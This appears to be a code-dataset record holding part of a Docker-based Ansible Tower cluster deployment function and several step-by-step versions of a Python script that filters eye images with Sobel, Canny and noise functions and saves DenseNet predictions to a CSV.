dict(towerVersion=towerVersion, osVersion=osVersion, loadBalance=loadBalance, namingConvention=namingConvention, externalPort=externalPort, containerCount=containerCount, debug=debug)\n print(runClusterOpts)\n\n # Check to see if specified towerVersion has image built\n check = towerdev.utilities.imageCheck(towerVersion)\n\n # How we proceed with imageCheck() return\n if check is False:\n print(color(\"ERROR: Deployment of container cluster failed. Please make sure the specified version of Tower has an image built.\", fg=\"red\"))\n return False\n else:\n for c in range(containerCount):\n runTowerContainer(towerVersion=towerVersion, externalPort=externalPort, osVersion=osVersion, containerName=\"{0}-{1}\".format(namingConvention,c))\n\n clusterContainers = dockerClient.containers.list(filters={'name': '{0}-*'.format(namingConvention)})\n containerIps = []\n\n # Gather container IPs for inventory fillout\n for c in range(len(clusterContainers)):\n containerIp = clusterContainers[c].attrs['NetworkSettings']['IPAddress']\n containerIps.append(containerIp)\n\n print(clusterContainers[0])\n\n # Choose inventory file based on towerVersion\n if \"3.5\" in towerVersion:\n chooseInventoryCmd = 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.5.x /opt/ansible-tower-setup-{0}-1/inventory'.format(towerVersion)\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif \"3.6\" in towerVersion:\n chooseInventoryCmd = 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.6.x /opt/ansible-tower-setup-{0}-1/inventory'.format(towerVersion)\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif \"3.7\" in towerVersion:\n chooseInventoryCmd = 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.7.x /opt/ansible-tower-setup-{0}-1/inventory'.format(towerVersion)\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n elif \"3.8\" in towerVersion:\n chooseInventoryCmd = 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.8.x /opt/ansible-tower-setup-{0}-1/inventory'.format(towerVersion)\n runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)\n\n # Choose messaging backend based on towerVersion\n if \"3.5\" in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = 'sed -i \"2i{0} rabbitmq_host={0}\" /opt/ansible-tower-setup-{1}-1/inventory'.format(i, towerVersion)\n runInventoryCmd = clusterContainers[0].exec_run(cmd=modifyInventoryCmd)\n elif \"3.6\" in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = 'sed -i \"2i{0} rabbitmq_host={0}\" /opt/ansible-tower-setup-{1}-1/inventory'.format(i, towerVersion)\n runInventoryCmd = clusterContainers[0].exec_run(cmd=modifyInventoryCmd)\n elif \"3.7\" in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = 'sed -i \"2i{0} routable_hostname={0}\" /opt/ansible-tower-setup-{1}-1/inventory'.format(i, towerVersion)\n runInventoryCmd = clusterContainers[0].exec_run(cmd=modifyInventoryCmd)\n elif \"3.8\" in towerVersion:\n for i in containerIps:\n modifyInventoryCmd = 'sed -i \"2i{0} routable_hostname={0}\" /opt/ansible-tower-setup-{1}-1/inventory'.format(i, towerVersion)\n runInventoryCmd = clusterContainers[0].exec_run(cmd=modifyInventoryCmd)\n\n # Call ./setup.sh from first container in list\n setupCmd = '/bin/bash -c \"cd /opt/ansible-tower-setup-{0}-1 && ./setup.sh\"'.format(towerVersion)\n setupLbCmd = '/bin/bash -c \"cd /opt/ansible-tower-setup-{0}-1 && ./setup.sh -e nginx_disable_https=true\"'.format(towerVersion)\n inventoryDbVersion = towerVersion.replace(\".\", \"\")\n modifyInventoryDbCmd = \"sed -i 's/XXX/{0}/g' /opt/ansible-tower-setup-{1}-1/inventory\".format(inventoryDbVersion, towerVersion)\n runDatabaseCmd = clusterContainers[0].exec_run(cmd=modifyInventoryDbCmd)\n\n if loadBalance:\n print(color(\"INFO: Running ./setup.sh with load balance configuration...\", fg=\"yellow\"))\n\n # Stream output based on option\n if stream:\n lowLevelClient = towerdev.common.apiClient()\n calcRunContainer = len(clusterContainers) - 1\n createExec = lowLevelClient.exec_create(container=\"{0}-{1}\".format(namingConvention, calcRunContainer), cmd=setupLbCmd)\n runSetupCmd = lowLevelClient.exec_start(exec_id=createExec['Id'], stream=True, detach=False)\n\n for line in runSetupCmd:\n print(line.decode('utf-8'))\n\n inspect = lowLevelClient.exec_inspect(exec_id=createExec['Id'])\n setupCmdCode = inspect['ExitCode']\n\n containersList = dockerClient.containers.list(filters={'name': '{0}-*'.format(namingConvention)})\n\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n\n if setupCmdCode is not 0:\n clusterStatus = False\n\n else:\n runSetupCmd = towerContainer.exec_run(cmd=setupLbCmd)\n\n else:\n print(color(\"INFO: Running ./setup.sh with no load balance configuration...\", fg=\"yellow\"))\n\n # Stream output based on option\n if stream:\n lowLevelClient = towerdev.common.apiClient()\n calcRunContainer = len(clusterContainers) - 1\n createExec = lowLevelClient.exec_create(container=\"{0}-{1}\".format(namingConvention, calcRunContainer), cmd=setupCmd)\n runSetupCmd = lowLevelClient.exec_start(exec_id=createExec['Id'], stream=True, detach=False)\n\n for line in runSetupCmd:\n print(line.decode('utf-8'))\n\n inspect = lowLevelClient.exec_inspect(exec_id=createExec['Id'])\n setupCmdCode = inspect['ExitCode']\n containersList = dockerClient.containers.list(filters={'name': '{0}-*'.format(namingConvention)})\n\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n\n if setupCmdCode is not 0:\n clusterStatus = False\n\n else:\n runSetupCmd = towerContainer.exec_run(cmd=setupCmd)\n containersList = dockerClient.containers.list(filters={'name': '{0}-*'.format(namingConvention)})\n\n if len(containersList) == containerCount:\n clusterStatus = True\n else:\n clusterStatus = False\n\n if runSetupCmd[0] is not 0:\n clusterStatus = False\n\n return clusterStatus\n\n\ndef runTowerContainer(towerVersion, externalPort, osVersion, containerName, debug=False, **kwargs):\n \"\"\"Runs Tower container from pre-existing image\"\"\"\n allowedMemory = None\n\n # Optional debug that prints a dict of options\n if debug == True:\n runOpts = dict(towerVersion=towerVersion, externalPort=externalPort, osVersion=osVersion, containerName=containerName)\n print(runOpts)\n\n # Determines what we do based on externalPort input\n if not externalPort:\n if allowedMemory is not None:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'.format(osVersion, towerVersion), privileged=False, volumes={'/sys/fs/cgroup': {'bind':'/sys/fs/cgroup', 'mode':'ro'}}, tmpfs={'/tmp':'exec', '/run':''}, detach=True, name=containerName, mem_limit=allowedMemory, ports={'443/tcp':None})\n else:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'.format(osVersion, towerVersion), privileged=False, volumes={'/sys/fs/cgroup': {'bind':'/sys/fs/cgroup', 'mode':'ro'}}, tmpfs={'/tmp':'exec', '/run':''}, detach=True, name=containerName, ports={'443/tcp':None})\n else:\n if allowedMemory is not None:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'.format(osVersion, towerVersion), privileged=False, volumes={'/sys/fs/cgroup': {'bind':'/sys/fs/cgroup', 'mode':'ro'}}, tmpfs={'/tmp':'exec', '/run':''}, detach=True, name=containerName, mem_limit=allowedMemory, ports={'443/tcp':externalPort})\n else:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'.format(osVersion, towerVersion), privileged=False, volumes={'/sys/fs/cgroup': {'bind':'/sys/fs/cgroup', 'mode':'ro'}}, tmpfs={'/tmp':'exec', '/run':''}, detach=True, name=containerName, ports={'443/tcp':externalPort})\n\n containersList = dockerClient.containers.list(filters={'name': containerName})\n\n if len(containersList) == 1:\n creationStatus = True\n else:\n creationStatus = False\n\n return creationStatus\n\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def preprocess_image(image_path, desired_size=SIZE):
"""
Resize the picture to the desired size
:param image_path: the path of image folder
:param desired_size: the size that image will be cropped as. The default size is 224*224
:return: the cropped image
"""
im = Image.open(image_path)
im = im.resize((desired_size,) * 2, resample=Image.LANCZOS)
return im
def set_data(img_path, dataframe):
"""
Correspond the image to the label and return them.
:param img_path: the path of images' folder
:param dataframe: the .csv file that shows relation between image and label
:return: Image, Label and the name of Image
"""
N = len(os.listdir(img_path))
x_ = np.empty((N, SIZE, SIZE, 3), dtype=np.uint8)
y_ = np.empty(N)
image_names = np.empty(N, dtype=np.dtype(('U', 15)))
for i, img_name in enumerate(tqdm(os.listdir(img_path))):
x_[i, :, :, :] = preprocess_image(img_path + img_name)
y_[i] = dataframe.loc[img_name.split('.')[0], 'level']
image_names[i] = img_name
return x_, y_
def predict(X):
model = load_model(model_path, custom_objects={'precision': precision,
'recall': recall, 'f1': f1})
ret = model.predict(X)
return ret
def sobel(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
grad_x = cv.Sobel(np.float32(img), cv.CV_32F, 1, 0)
grad_y = cv.Sobel(np.float32(img), cv.CV_32F, 0, 1)
gradx = cv.convertScaleAbs(grad_x)
grady = cv.convertScaleAbs(grad_y)
gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)
ret[i, :] = gradxy
return ret
def canny(img_set):
ret = np.empty(img_set.shape)
for i, image in enumerate(tqdm(img_set)):
blurred = cv.GaussianBlur(np.float32(image), (3, 3), 0)
gray = cv.cvtColor(blurred, cv.COLOR_RGB2GRAY)
edge_output = cv.Canny(gray, 50, 150)
dst = cv.bitwise_and(image, image, mask=edge_output)
print(dst)
ret[i, :] = dst
return ret
def scharr(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
grad_x = cv.Scharr(np.float32(img), cv.CV_32F, 1, 0)
grad_y = cv.Scharr(np.float32(img), cv.CV_32F, 0, 1)
gradx = cv.convertScaleAbs(grad_x)
grady = cv.convertScaleAbs(grad_y)
gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)
ret[i, :] = gradxy
return ret
def laplace(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
gray_lap = cv.Laplacian(np.float32(img), cv.CV_32F, ksize=3)
dst = cv.convertScaleAbs(gray_lap)
ret[i, :] = dst
return ret
<|reserved_special_token_0|>
def gasuss_noise(img_set, mean=0, var=0.01):
ret = np.empty(img_set.shape)
for m, image in enumerate(tqdm(img_set)):
image = np.array(image / 255, dtype=float)
noise = np.random.normal(mean, var ** 0.5, image.shape)
out = image + noise
if out.min() < 0:
low_clip = -1.0
else:
low_clip = 0.0
out = np.clip(out, low_clip, 1.0)
out = np.uint8(out * 255)
ret[m, :] = out
return ret
def ouput_csv(X_, Y_, csv_path):
model = load_model(model_path, custom_objects={'precision': precision,
'recall': recall, 'f1': f1})
data = model.predict(X_)
dataDF = pd.DataFrame(data)
dataDF['level'] = Y_[:, 0]
dataDF['label'] = Y_[:, 1]
print(dataDF)
dataDF.to_csv(csv_path, index=False)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def preprocess_image(image_path, desired_size=SIZE):
"""
Resize the picture to the desired size
:param image_path: the path of image folder
:param desired_size: the size that image will be cropped as. The default size is 224*224
:return: the cropped image
"""
im = Image.open(image_path)
im = im.resize((desired_size,) * 2, resample=Image.LANCZOS)
return im
def set_data(img_path, dataframe):
"""
Correspond the image to the label and return them.
:param img_path: the path of images' folder
:param dataframe: the .csv file that shows relation between image and label
:return: Image, Label and the name of Image
"""
N = len(os.listdir(img_path))
x_ = np.empty((N, SIZE, SIZE, 3), dtype=np.uint8)
y_ = np.empty(N)
image_names = np.empty(N, dtype=np.dtype(('U', 15)))
for i, img_name in enumerate(tqdm(os.listdir(img_path))):
x_[i, :, :, :] = preprocess_image(img_path + img_name)
y_[i] = dataframe.loc[img_name.split('.')[0], 'level']
image_names[i] = img_name
return x_, y_
def predict(X):
model = load_model(model_path, custom_objects={'precision': precision,
'recall': recall, 'f1': f1})
ret = model.predict(X)
return ret
def sobel(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
grad_x = cv.Sobel(np.float32(img), cv.CV_32F, 1, 0)
grad_y = cv.Sobel(np.float32(img), cv.CV_32F, 0, 1)
gradx = cv.convertScaleAbs(grad_x)
grady = cv.convertScaleAbs(grad_y)
gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)
ret[i, :] = gradxy
return ret
def canny(img_set):
ret = np.empty(img_set.shape)
for i, image in enumerate(tqdm(img_set)):
blurred = cv.GaussianBlur(np.float32(image), (3, 3), 0)
gray = cv.cvtColor(blurred, cv.COLOR_RGB2GRAY)
edge_output = cv.Canny(gray, 50, 150)
dst = cv.bitwise_and(image, image, mask=edge_output)
print(dst)
ret[i, :] = dst
return ret
def scharr(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
grad_x = cv.Scharr(np.float32(img), cv.CV_32F, 1, 0)
grad_y = cv.Scharr(np.float32(img), cv.CV_32F, 0, 1)
gradx = cv.convertScaleAbs(grad_x)
grady = cv.convertScaleAbs(grad_y)
gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)
ret[i, :] = gradxy
return ret
def laplace(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
gray_lap = cv.Laplacian(np.float32(img), cv.CV_32F, ksize=3)
dst = cv.convertScaleAbs(gray_lap)
ret[i, :] = dst
return ret
def sp_noise(img_set, prob=0.1):
ret = np.empty(img_set.shape)
for m, image in enumerate(tqdm(img_set)):
out = np.zeros(image.shape, np.uint8)
thres = 1 - prob
for i in range(image.shape[0]):
for j in range(image.shape[1]):
rdn = random.random()
if rdn < prob:
out[i][j] = 0
elif rdn > thres:
out[i][j] = 255
else:
out[i][j] = image[i][j]
ret[m, :] = out
return ret
def gasuss_noise(img_set, mean=0, var=0.01):
ret = np.empty(img_set.shape)
for m, image in enumerate(tqdm(img_set)):
image = np.array(image / 255, dtype=float)
noise = np.random.normal(mean, var ** 0.5, image.shape)
out = image + noise
if out.min() < 0:
low_clip = -1.0
else:
low_clip = 0.0
out = np.clip(out, low_clip, 1.0)
out = np.uint8(out * 255)
ret[m, :] = out
return ret
def ouput_csv(X_, Y_, csv_path):
model = load_model(model_path, custom_objects={'precision': precision,
'recall': recall, 'f1': f1})
data = model.predict(X_)
dataDF = pd.DataFrame(data)
dataDF['level'] = Y_[:, 0]
dataDF['label'] = Y_[:, 1]
print(dataDF)
dataDF.to_csv(csv_path, index=False)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
os.environ['CUDA_VISIBLE_DEVICES'] = '1'
model_path = '/home/bo/Project/densenet.hdf5'
train_img_path = '/home/bo/Project/Eyes_data/first_train/'
test_img_path = '/home/bo/Project/Eyes_data/first_test/'
label_df = pd.read_csv('/home/bo/Project/Eyes_data/first_label.csv',
error_bad_lines=False, index_col=0)
SIZE = 224
def preprocess_image(image_path, desired_size=SIZE):
"""
Resize the picture to the desired size
:param image_path: the path of image folder
:param desired_size: the size that image will be cropped as. The default size is 224*224
:return: the cropped image
"""
im = Image.open(image_path)
im = im.resize((desired_size,) * 2, resample=Image.LANCZOS)
return im
def set_data(img_path, dataframe):
"""
Correspond the image to the label and return them.
:param img_path: the path of images' folder
:param dataframe: the .csv file that shows relation between image and label
:return: Image, Label and the name of Image
"""
N = len(os.listdir(img_path))
x_ = np.empty((N, SIZE, SIZE, 3), dtype=np.uint8)
y_ = np.empty(N)
image_names = np.empty(N, dtype=np.dtype(('U', 15)))
for i, img_name in enumerate(tqdm(os.listdir(img_path))):
x_[i, :, :, :] = preprocess_image(img_path + img_name)
y_[i] = dataframe.loc[img_name.split('.')[0], 'level']
image_names[i] = img_name
return x_, y_
def predict(X):
model = load_model(model_path, custom_objects={'precision': precision,
'recall': recall, 'f1': f1})
ret = model.predict(X)
return ret
def sobel(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
grad_x = cv.Sobel(np.float32(img), cv.CV_32F, 1, 0)
grad_y = cv.Sobel(np.float32(img), cv.CV_32F, 0, 1)
gradx = cv.convertScaleAbs(grad_x)
grady = cv.convertScaleAbs(grad_y)
gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)
ret[i, :] = gradxy
return ret
def canny(img_set):
ret = np.empty(img_set.shape)
for i, image in enumerate(tqdm(img_set)):
blurred = cv.GaussianBlur(np.float32(image), (3, 3), 0)
gray = cv.cvtColor(blurred, cv.COLOR_RGB2GRAY)
edge_output = cv.Canny(gray, 50, 150)
dst = cv.bitwise_and(image, image, mask=edge_output)
print(dst)
ret[i, :] = dst
return ret
def scharr(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
grad_x = cv.Scharr(np.float32(img), cv.CV_32F, 1, 0)
grad_y = cv.Scharr(np.float32(img), cv.CV_32F, 0, 1)
gradx = cv.convertScaleAbs(grad_x)
grady = cv.convertScaleAbs(grad_y)
gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)
ret[i, :] = gradxy
return ret
def laplace(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
gray_lap = cv.Laplacian(np.float32(img), cv.CV_32F, ksize=3)
dst = cv.convertScaleAbs(gray_lap)
ret[i, :] = dst
return ret
def sp_noise(img_set, prob=0.1):
ret = np.empty(img_set.shape)
for m, image in enumerate(tqdm(img_set)):
out = np.zeros(image.shape, np.uint8)
thres = 1 - prob
for i in range(image.shape[0]):
for j in range(image.shape[1]):
rdn = random.random()
if rdn < prob:
out[i][j] = 0
elif rdn > thres:
out[i][j] = 255
else:
out[i][j] = image[i][j]
ret[m, :] = out
return ret
def gasuss_noise(img_set, mean=0, var=0.01):
ret = np.empty(img_set.shape)
for m, image in enumerate(tqdm(img_set)):
image = np.array(image / 255, dtype=float)
noise = np.random.normal(mean, var ** 0.5, image.shape)
out = image + noise
if out.min() < 0:
low_clip = -1.0
else:
low_clip = 0.0
out = np.clip(out, low_clip, 1.0)
out = np.uint8(out * 255)
ret[m, :] = out
return ret
def ouput_csv(X_, Y_, csv_path):
model = load_model(model_path, custom_objects={'precision': precision,
'recall': recall, 'f1': f1})
data = model.predict(X_)
dataDF = pd.DataFrame(data)
dataDF['level'] = Y_[:, 0]
dataDF['label'] = Y_[:, 1]
print(dataDF)
dataDF.to_csv(csv_path, index=False)
x_train, y_train = set_data(train_img_path, label_df)
y_in = np.c_[y_train, np.ones(y_train.shape[0])]
x_test, y_test = set_data(test_img_path, label_df)
y_out = np.c_[y_test, np.zeros(y_test.shape[0])]
X_ = np.r_[sobel(x_train), sobel(x_test)]
Y_ = np.r_[y_in, y_out]
ouput_csv(X_, Y_, 'sobel_eye.csv')
<|reserved_special_token_1|>
import random
import tqdm
from keras.models import load_model
from ModelUtil import precision, recall, f1
from tqdm import tqdm
import cv2 as cv
import numpy as np
import os
import pandas as pd
from PIL import Image
os.environ['CUDA_VISIBLE_DEVICES'] = '1'
model_path = '/home/bo/Project/densenet.hdf5'
train_img_path = '/home/bo/Project/Eyes_data/first_train/'
test_img_path = '/home/bo/Project/Eyes_data/first_test/'
label_df = pd.read_csv('/home/bo/Project/Eyes_data/first_label.csv',
error_bad_lines=False, index_col=0)
SIZE = 224
def preprocess_image(image_path, desired_size=SIZE):
"""
Resize the picture to the desired size
:param image_path: the path of image folder
:param desired_size: the size that image will be cropped as. The default size is 224*224
:return: the cropped image
"""
im = Image.open(image_path)
im = im.resize((desired_size,) * 2, resample=Image.LANCZOS)
return im
def set_data(img_path, dataframe):
"""
Correspond the image to the label and return them.
:param img_path: the path of images' folder
:param dataframe: the .csv file that shows relation between image and label
:return: Image, Label and the name of Image
"""
N = len(os.listdir(img_path))
x_ = np.empty((N, SIZE, SIZE, 3), dtype=np.uint8)
y_ = np.empty(N)
image_names = np.empty(N, dtype=np.dtype(('U', 15)))
for i, img_name in enumerate(tqdm(os.listdir(img_path))):
x_[i, :, :, :] = preprocess_image(img_path + img_name)
y_[i] = dataframe.loc[img_name.split('.')[0], 'level']
image_names[i] = img_name
return x_, y_
def predict(X):
model = load_model(model_path, custom_objects={'precision': precision,
'recall': recall, 'f1': f1})
ret = model.predict(X)
return ret
def sobel(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
grad_x = cv.Sobel(np.float32(img), cv.CV_32F, 1, 0)
grad_y = cv.Sobel(np.float32(img), cv.CV_32F, 0, 1)
gradx = cv.convertScaleAbs(grad_x)
grady = cv.convertScaleAbs(grad_y)
gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)
ret[i, :] = gradxy
return ret
def canny(img_set):
ret = np.empty(img_set.shape)
for i, image in enumerate(tqdm(img_set)):
blurred = cv.GaussianBlur(np.float32(image), (3, 3), 0)
gray = cv.cvtColor(blurred, cv.COLOR_RGB2GRAY)
edge_output = cv.Canny(gray, 50, 150)
dst = cv.bitwise_and(image, image, mask=edge_output)
print(dst)
ret[i, :] = dst
return ret
def scharr(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
grad_x = cv.Scharr(np.float32(img), cv.CV_32F, 1, 0)
grad_y = cv.Scharr(np.float32(img), cv.CV_32F, 0, 1)
gradx = cv.convertScaleAbs(grad_x)
grady = cv.convertScaleAbs(grad_y)
gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)
ret[i, :] = gradxy
return ret
def laplace(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
gray_lap = cv.Laplacian(np.float32(img), cv.CV_32F, ksize=3)
dst = cv.convertScaleAbs(gray_lap)
ret[i, :] = dst
return ret
def sp_noise(img_set, prob=0.1):
ret = np.empty(img_set.shape)
for m, image in enumerate(tqdm(img_set)):
out = np.zeros(image.shape, np.uint8)
thres = 1 - prob
for i in range(image.shape[0]):
for j in range(image.shape[1]):
rdn = random.random()
if rdn < prob:
out[i][j] = 0
elif rdn > thres:
out[i][j] = 255
else:
out[i][j] = image[i][j]
ret[m, :] = out
return ret
def gasuss_noise(img_set, mean=0, var=0.01):
ret = np.empty(img_set.shape)
for m, image in enumerate(tqdm(img_set)):
image = np.array(image / 255, dtype=float)
noise = np.random.normal(mean, var ** 0.5, image.shape)
out = image + noise
if out.min() < 0:
low_clip = -1.0
else:
low_clip = 0.0
out = np.clip(out, low_clip, 1.0)
out = np.uint8(out * 255)
ret[m, :] = out
return ret
def ouput_csv(X_, Y_, csv_path):
model = load_model(model_path, custom_objects={'precision': precision,
'recall': recall, 'f1': f1})
data = model.predict(X_)
dataDF = pd.DataFrame(data)
dataDF['level'] = Y_[:, 0]
dataDF['label'] = Y_[:, 1]
print(dataDF)
dataDF.to_csv(csv_path, index=False)
x_train, y_train = set_data(train_img_path, label_df)
y_in = np.c_[y_train, np.ones(y_train.shape[0])]
x_test, y_test = set_data(test_img_path, label_df)
y_out = np.c_[y_test, np.zeros(y_test.shape[0])]
X_ = np.r_[sobel(x_train), sobel(x_test)]
Y_ = np.r_[y_in, y_out]
ouput_csv(X_, Y_, 'sobel_eye.csv')
<|reserved_special_token_1|>
import random
import tqdm
from keras.models import load_model
from ModelUtil import precision, recall, f1
from tqdm import tqdm
import cv2 as cv
import numpy as np
import os
import pandas as pd
from PIL import Image
os.environ['CUDA_VISIBLE_DEVICES']='1'
model_path = '/home/bo/Project/densenet.hdf5'
train_img_path = '/home/bo/Project/Eyes_data/first_train/'
test_img_path = '/home/bo/Project/Eyes_data/first_test/'
label_df = pd.read_csv('/home/bo/Project/Eyes_data/first_label.csv', error_bad_lines=False, index_col=0)
SIZE = 224
def preprocess_image(image_path, desired_size=SIZE):
"""
Resize the picture to the desired size
:param image_path: the path of image folder
:param desired_size: the size that image will be cropped as. The default size is 224*224
:return: the cropped image
"""
im = Image.open(image_path)
im = im.resize((desired_size,) * 2, resample=Image.LANCZOS)
return im
def set_data(img_path, dataframe):
"""
Correspond the image to the label and return them.
:param img_path: the path of images' folder
:param dataframe: the .csv file that shows relation between image and label
:return: Image, Label and the name of Image
"""
N = len(os.listdir(img_path))
x_ = np.empty((N, SIZE, SIZE, 3), dtype=np.uint8)
y_ = np.empty(N)
image_names = np.empty(N, dtype=np.dtype(('U', 15)))
for i, img_name in enumerate(tqdm(os.listdir(img_path))):
x_[i, :, :, :] = preprocess_image(img_path + img_name)
y_[i] = dataframe.loc[img_name.split('.')[0], 'level']
image_names[i] = img_name
return x_, y_
def predict(X):
model = load_model(model_path,
custom_objects={'precision': precision, 'recall': recall, 'f1': f1})
ret = model.predict(X)
return ret
def sobel(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
grad_x = cv.Sobel(np.float32(img), cv.CV_32F, 1, 0)
grad_y = cv.Sobel(np.float32(img), cv.CV_32F, 0, 1)
gradx = cv.convertScaleAbs(grad_x)
grady = cv.convertScaleAbs(grad_y)
gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)
ret[i, :] = gradxy
return ret
def canny(img_set):
ret = np.empty(img_set.shape)
for i, image in enumerate(tqdm(img_set)):
blurred = cv.GaussianBlur(np.float32(image), (3, 3), 0)
gray = cv.cvtColor(blurred, cv.COLOR_RGB2GRAY)
edge_output = cv.Canny(gray, 50, 150)
dst = cv.bitwise_and(image, image, mask=edge_output)
print(dst)
ret[i, :] = dst
return ret
def scharr(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
grad_x = cv.Scharr(np.float32(img), cv.CV_32F, 1, 0)
grad_y = cv.Scharr(np.float32(img), cv.CV_32F, 0, 1)
gradx = cv.convertScaleAbs(grad_x)
grady = cv.convertScaleAbs(grad_y)
gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)
ret[i, :] = gradxy
return ret
def laplace(img_set):
ret = np.empty(img_set.shape)
for i, img in enumerate(tqdm(img_set)):
gray_lap = cv.Laplacian(np.float32(img), cv.CV_32F, ksize=3)
dst = cv.convertScaleAbs(gray_lap)
ret[i, :] = dst
return ret
def sp_noise(img_set, prob=0.1):
ret = np.empty(img_set.shape)
for m, image in enumerate(tqdm(img_set)):
out = np.zeros(image.shape, np.uint8)
thres = 1 - prob
for i in range(image.shape[0]):
for j in range(image.shape[1]):
rdn = random.random()
if rdn < prob:
out[i][j] = 0
elif rdn > thres:
out[i][j] = 255
else:
out[i][j] = image[i][j]
ret[m,:] = out
return ret
def gasuss_noise(img_set, mean=0, var=0.01):
ret = np.empty(img_set.shape)
for m, image in enumerate(tqdm(img_set)):
image = np.array(image/255, dtype=float)
noise = np.random.normal(mean, var ** 0.5, image.shape)
out = image + noise
if out.min() < 0:
low_clip = -1.
else:
low_clip = 0.
out = np.clip(out, low_clip, 1.0)
out = np.uint8(out*255)
ret[m, :] = out
return ret
def ouput_csv(X_, Y_, csv_path):
model = load_model(model_path,
custom_objects={'precision': precision, 'recall': recall, 'f1': f1})
data = model.predict(X_)
dataDF = pd.DataFrame(data)
dataDF['level'] = Y_[:, 0]
dataDF['label'] = Y_[:, 1]
print(dataDF)
dataDF.to_csv(csv_path, index=False)
## if you would like to use sobel
x_train, y_train = set_data(train_img_path,label_df)
y_in = np.c_[y_train, np.ones(y_train.shape[0])]
x_test, y_test = set_data(test_img_path,label_df)
y_out = np.c_[y_test, np.zeros(y_test.shape[0])]
X_ = np.r_[sobel(x_train), sobel(x_test)]
Y_ = np.r_[y_in, y_out]
ouput_csv(X_, Y_, 'sobel_eye.csv')
## original output without operator
# x_train, y_train = set_data(train_img_path,label_df)
# y_in = np.c_[y_train, np.ones(y_train.shape[0])]
# x_test, y_test = set_data(test_img_path,label_df)
# y_out = np.c_[y_test, np.zeros(y_test.shape[0])]
#
# X_ = np.r_[x_train, x_test]
# Y_ = np.r_[y_in, y_out]
#
# ouput_csv(X_, Y_, 'sobel_eye.csv')
|
flexible
|
{
"blob_id": "c2b3594d25e2d1670d9b99e0d3484c680f59421f",
"index": 9465,
"step-1": "<mask token>\n\n\ndef preprocess_image(image_path, desired_size=SIZE):\n \"\"\"\n Resize the picture to the desired size\n :param image_path: the path of image folder\n :param desired_size: the size that image will be cropped as. The default size is 224*224\n :return: the cropped image\n \"\"\"\n im = Image.open(image_path)\n im = im.resize((desired_size,) * 2, resample=Image.LANCZOS)\n return im\n\n\ndef set_data(img_path, dataframe):\n \"\"\"\n Correspond the image to the label and return them.\n :param img_path: the path of images' folder\n :param dataframe: the .csv file that shows relation between image and label\n :return: Image, Label and the name of Image\n \"\"\"\n N = len(os.listdir(img_path))\n x_ = np.empty((N, SIZE, SIZE, 3), dtype=np.uint8)\n y_ = np.empty(N)\n image_names = np.empty(N, dtype=np.dtype(('U', 15)))\n for i, img_name in enumerate(tqdm(os.listdir(img_path))):\n x_[i, :, :, :] = preprocess_image(img_path + img_name)\n y_[i] = dataframe.loc[img_name.split('.')[0], 'level']\n image_names[i] = img_name\n return x_, y_\n\n\ndef predict(X):\n model = load_model(model_path, custom_objects={'precision': precision,\n 'recall': recall, 'f1': f1})\n ret = model.predict(X)\n return ret\n\n\ndef sobel(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n grad_x = cv.Sobel(np.float32(img), cv.CV_32F, 1, 0)\n grad_y = cv.Sobel(np.float32(img), cv.CV_32F, 0, 1)\n gradx = cv.convertScaleAbs(grad_x)\n grady = cv.convertScaleAbs(grad_y)\n gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)\n ret[i, :] = gradxy\n return ret\n\n\ndef canny(img_set):\n ret = np.empty(img_set.shape)\n for i, image in enumerate(tqdm(img_set)):\n blurred = cv.GaussianBlur(np.float32(image), (3, 3), 0)\n gray = cv.cvtColor(blurred, 